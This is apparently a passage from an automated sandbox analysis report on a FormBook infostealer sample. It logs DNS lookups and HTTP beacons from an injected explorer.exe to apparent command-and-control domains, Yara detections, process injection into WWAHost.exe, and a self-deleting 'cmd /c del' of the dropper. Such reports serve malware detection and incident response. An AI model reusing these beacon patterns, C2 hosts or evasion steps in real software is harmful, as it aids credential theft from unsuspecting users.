                                           Sep 27, 2021 21:06:21.532602072 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:21.997997999 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:22.071230888 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:22.568157911 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:22.602807999 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:22.627233982 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:22.640460014 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:23.116815090 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:23.130039930 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:23.803390026 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:23.819374084 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:24.670516014 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:24.684900999 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:25.197482109 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:25.270685911 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:25.463162899 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:25.505198002 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:26.416028976 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:26.434570074 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:30.520242929 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:30.547971010 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:35.663887978 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:35.699017048 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:40.929733038 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:40.970762968 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:46.039324045 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:46.097685099 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:51.119846106 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:51.155942917 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:07:01.369004965 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:01.650717974 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:07:06.746467113 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:06.774045944 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:07:06.792208910 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:06.828392029 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:07:08.524833918 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:08.539501905 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:07:11.835009098 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:11.863893032 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:07:17.312665939 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:17.348882914 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:07:23.146285057 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:23.229141951 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:07:28.240982056 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:29.255203009 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:07:29.344136953 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4

                                          DNS Queries

                                           Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                           Sep 27, 2021 21:06:25.463162899 CEST | 192.168.2.4 | 8.8.8.8 | 0xaa6b | Standard query (0) | www.kxdrstone.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:06:30.520242929 CEST | 192.168.2.4 | 8.8.8.8 | 0xd5e4 | Standard query (0) | www.nurhalilah.xyz | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:06:35.663887978 CEST | 192.168.2.4 | 8.8.8.8 | 0xccdd | Standard query (0) | www.uscryptomininglaws.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:06:40.929733038 CEST | 192.168.2.4 | 8.8.8.8 | 0x924e | Standard query (0) | www.financecreditpro.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:06:46.039324045 CEST | 192.168.2.4 | 8.8.8.8 | 0xc1cb | Standard query (0) | www.smpldebts.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:06:51.119846106 CEST | 192.168.2.4 | 8.8.8.8 | 0xcfe3 | Standard query (0) | www.portale-accessi-anomali.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:07:01.369004965 CEST | 192.168.2.4 | 8.8.8.8 | 0x4e51 | Standard query (0) | www.lottochain.bet | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:07:06.792208910 CEST | 192.168.2.4 | 8.8.8.8 | 0x1e46 | Standard query (0) | www.healthcaresms.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:07:11.835009098 CEST | 192.168.2.4 | 8.8.8.8 | 0x7048 | Standard query (0) | www.2377k.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:07:17.312665939 CEST | 192.168.2.4 | 8.8.8.8 | 0xc19a | Standard query (0) | www.drive16pay.art | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:07:23.146285057 CEST | 192.168.2.4 | 8.8.8.8 | 0xfcd1 | Standard query (0) | www.21lawsofconfidence.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:07:28.240982056 CEST | 192.168.2.4 | 8.8.8.8 | 0xf6d2 | Standard query (0) | www.byemreperde.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 21:07:29.255203009 CEST | 192.168.2.4 | 8.8.8.8 | 0xf6d2 | Standard query (0) | www.byemreperde.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          Sep 27, 2021 21:06:25.505198002 CEST | 8.8.8.8 | 192.168.2.4 | 0xaa6b | Name error (3) | www.kxdrstone.com | none | none | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:06:30.547971010 CEST | 8.8.8.8 | 192.168.2.4 | 0xd5e4 | No error (0) | www.nurhalilah.xyz | | 104.21.11.163 | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:06:30.547971010 CEST | 8.8.8.8 | 192.168.2.4 | 0xd5e4 | No error (0) | www.nurhalilah.xyz | | 172.67.166.108 | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:06:35.699017048 CEST | 8.8.8.8 | 192.168.2.4 | 0xccdd | No error (0) | www.uscryptomininglaws.com | uscryptomininglaws.com | | CNAME (Canonical name) | IN (0x0001)
                                          Sep 27, 2021 21:06:35.699017048 CEST | 8.8.8.8 | 192.168.2.4 | 0xccdd | No error (0) | uscryptomininglaws.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:06:40.970762968 CEST | 8.8.8.8 | 192.168.2.4 | 0x924e | No error (0) | www.financecreditpro.com | | 5.9.90.226 | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:06:46.097685099 CEST | 8.8.8.8 | 192.168.2.4 | 0xc1cb | Name error (3) | www.smpldebts.com | none | none | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:06:51.155942917 CEST | 8.8.8.8 | 192.168.2.4 | 0xcfe3 | Name error (3) | www.portale-accessi-anomali.com | none | none | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST | 8.8.8.8 | 192.168.2.4 | 0x4e51 | No error (0) | www.lottochain.bet | www215.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST | 8.8.8.8 | 192.168.2.4 | 0x4e51 | No error (0) | www215.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST | 8.8.8.8 | 192.168.2.4 | 0x4e51 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST | 8.8.8.8 | 192.168.2.4 | 0x4e51 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST | 8.8.8.8 | 192.168.2.4 | 0x4e51 | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:07:06.828392029 CEST | 8.8.8.8 | 192.168.2.4 | 0x1e46 | Name error (3) | www.healthcaresms.com | none | none | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:07:11.863893032 CEST | 8.8.8.8 | 192.168.2.4 | 0x7048 | No error (0) | www.2377k.com | | 172.67.148.98 | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:07:11.863893032 CEST | 8.8.8.8 | 192.168.2.4 | 0x7048 | No error (0) | www.2377k.com | | 104.21.95.204 | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:07:17.348882914 CEST | 8.8.8.8 | 192.168.2.4 | 0xc19a | No error (0) | www.drive16pay.art | | 202.165.66.108 | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:07:23.229141951 CEST | 8.8.8.8 | 192.168.2.4 | 0xfcd1 | Name error (3) | www.21lawsofconfidence.com | none | none | A (IP address) | IN (0x0001)
                                          Sep 27, 2021 21:07:29.344136953 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6d2 | Server failure (2) | www.byemreperde.com | none | none | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.nurhalilah.xyz
                                          • www.uscryptomininglaws.com
                                          • www.financecreditpro.com
                                          • www.lottochain.bet
                                          • www.2377k.com
                                          • www.drive16pay.art

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.4 | 49828 | 104.21.11.163 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Sep 27, 2021 21:06:30.575259924 CEST | 6368 | OUT | GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1
                                          Host: www.nurhalilah.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:30.639205933 CEST | 6369 | IN | HTTP/1.1 301 Moved Permanently
                                          Date: Mon, 27 Sep 2021 19:06:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          location: http://nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ejOSNG8T2aT1OBl7nSpcHjNMnlNv3fyuC2y9V2YU1Ybr7aR%2F8NvfA%2B3bKRAZJYtqSa7OoxuMXeGni7nL01h13aZ6eWXQ%2B92UBKeF5EjJ5o5SPVrRZiHWjsRCX0crUEqGXOshnxA%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 695702752fad05e9-FRA
                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                          Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.4 | 49829 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Sep 27, 2021 21:06:35.714364052 CEST | 6370 | OUT | GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1
                                          Host: www.uscryptomininglaws.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:35.892570972 CEST | 6370 | IN | HTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 19:06:35 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6151bfae-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.4 | 49839 | 5.9.90.226 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Sep 27, 2021 21:06:40.999752998 CEST | 6391 | OUT | GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1
                                          Host: www.financecreditpro.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:41.026473045 CEST | 6393 | IN | HTTP/1.1 301 Moved Permanently
                                          Server: nginx/1.20.1
                                          Date: Mon, 27 Sep 2021 19:06:41 GMT
                                          Content-Type: text/html
                                          Content-Length: 169
                                          Connection: close
                                          Location: http://financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00
                                          Strict-Transport-Security: max-age=31536000
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          3 | 192.168.2.4 | 49849 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Sep 27, 2021 21:07:01.684684992 CEST | 6415 | OUT | GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1
                                          Host: www.lottochain.bet
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:01.767618895 CEST | 6416 | IN | HTTP/1.1 301 Moved Permanently
                                          Date: Mon, 27 Sep 2021 19:07:01 GMT
                                          Content-Length: 0
                                          Connection: close
                                          location: https://www.lottochain.bet/r95e?5jTDyZ=TgnCaJJuD0kHzauLDq%2FdXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00
                                          strict-transport-security: max-age=120
                                          x-wix-request-id: 1632769621.701204728676110080
                                          Age: 0
                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVi7JwZOAS6ilH0jZpKLTjKF,qquldgcFrj2n046g4RNSVHgoSL3TVJh4IE7YwTXHesA=,2d58ifebGbosy5xc+FRalqCg7GVJ0AblbBa19E7yp9/Jevmsc5dw521bQk+YVUcMC5pgEgJzARPPe1194hBnp8TkJSrzujHds9w7kmIwT90=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBeGvZbATxKf3YHVGfwvvgmSTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UvY1uiXtmgas6aI2l+unv1BiX1kNVdl/4TGIg4ZwPbq2MDV1s43JGm4rKGF0jsK6iy9RDN50yNDYuMRjpFglRg==
                                          Cache-Control: no-cache
                                          X-Content-Type-Options: nosniff
                                          Server: Pepyaka/1.19.10


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          4 | 192.168.2.4 | 49862 | 172.67.148.98 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Sep 27, 2021 21:07:11.884968996 CEST | 6458 | OUT | GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1
                                          Host: www.2377k.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:12.270593882 CEST | 6459 | IN | HTTP/1.1 404 Not Found
                                          Date: Mon, 27 Sep 2021 19:07:12 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          vary: Accept-Encoding
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L1%2Fcb9sF0iYG9tLZL%2BCND7WWwL50k6FpCO6GkNPjTY8HledrDzcbyuzJAJs%2BC3yUD5GaZvDIhbwwTZOsvt8Qf3jJY5JuckW7ioIU2oZopXGVv5Lg9KbGsLMIggxHDd9g"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 6957037758895c14-FRA
                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                          Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          5 | 192.168.2.4 | 49863 | 202.165.66.108 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Sep 27, 2021 21:07:17.622366905 CEST | 6467 | OUT | GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1
                                          Host: www.drive16pay.art
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:18.216249943 CEST | 6467 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx/1.21.0
                                          Date: Mon, 27 Sep 2021 19:07:18 GMT
                                          Content-Type: application/json; charset=utf-8
                                          Content-Length: 167
                                          Connection: close
                                          X-Powered-By: Express
                                          ETag: W/"a7-WoatyhJzGlRwwZ9faPbF6C/DR18"
                                          Data Ascii: {"statusCode":404,"error":"Not Found","message":"Cannot GET /click/proxyjs/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00"}


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          System Behavior

                                          General

                                          Start time:21:05:17
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\DN_467842234567.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x400000
                                          File size:259211 bytes
                                          MD5 hash:C16013EA29F9DD1525DCB65C2184784E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:21:05:18
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\DN_467842234567.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x400000
                                          File size:259211 bytes
                                          MD5 hash:C16013EA29F9DD1525DCB65C2184784E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:21:05:22
                                          Start date:27/09/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Start time:21:05:44
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\WWAHost.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                          Imagebase:0x10d0000
                                          File size:829856 bytes
                                          MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          General

                                          Start time:21:05:49
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:21:05:50
                                          Start date:27/09/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis
